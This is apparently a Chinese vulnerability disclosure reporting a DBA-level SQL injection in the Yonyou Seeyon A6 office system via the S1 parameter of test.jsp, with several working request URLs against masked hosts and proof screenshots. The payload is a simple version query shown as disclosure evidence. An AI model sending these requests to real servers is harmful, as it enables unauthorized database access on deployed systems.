用友致远A6协同办公系统存在一处DBA权限SQL注入漏洞

### 简要描述： RT ### 详细说明： 搜索了一下， 没有被提交 漏洞位于：/yyoa/common/js/menu/test.jsp 文件中S1 参数 案例 ``` http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version **.**.**.**:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version ``` 更多案例 可参照http://**.**.**.**/bugs/wooyun-2015-0105038 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201511/25232331ae0747854ae60d3dc743659765070276.png" alt="QQ20151125-3@2x.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/25232331ae0747854ae60d3dc743659765070276.png) [<img src="https://images.seebug.org/upload/201511/25232346b1c091cfface04fc1cacec9eb4427ceb.png" alt="QQ20151125-4@2x.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/25232346b1c091cfface04fc1cacec9eb4427ceb.png) [<img src="https://images.seebug.org/upload/201511/25232402cf950414a36fd88f87ac719c1b9728bb.png" alt="QQ20151125-5@2x.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/25232402cf950414a36fd88f87ac719c1b9728bb.png) [<img src="https://images.seebug.org/upload/201511/25232423d386fb9d4ad90853d707697b665a6865.png" alt="QQ20151125-6@2x.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/25232423d386fb9d4ad90853d707697b665a6865.png) [<img src="https://images.seebug.org/upload/201511/25232444450c1b40b9d6be7fad7210be71485435.png" alt="QQ20151125-7@2x.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/25232444450c1b40b9d6be7fad7210be71485435.png)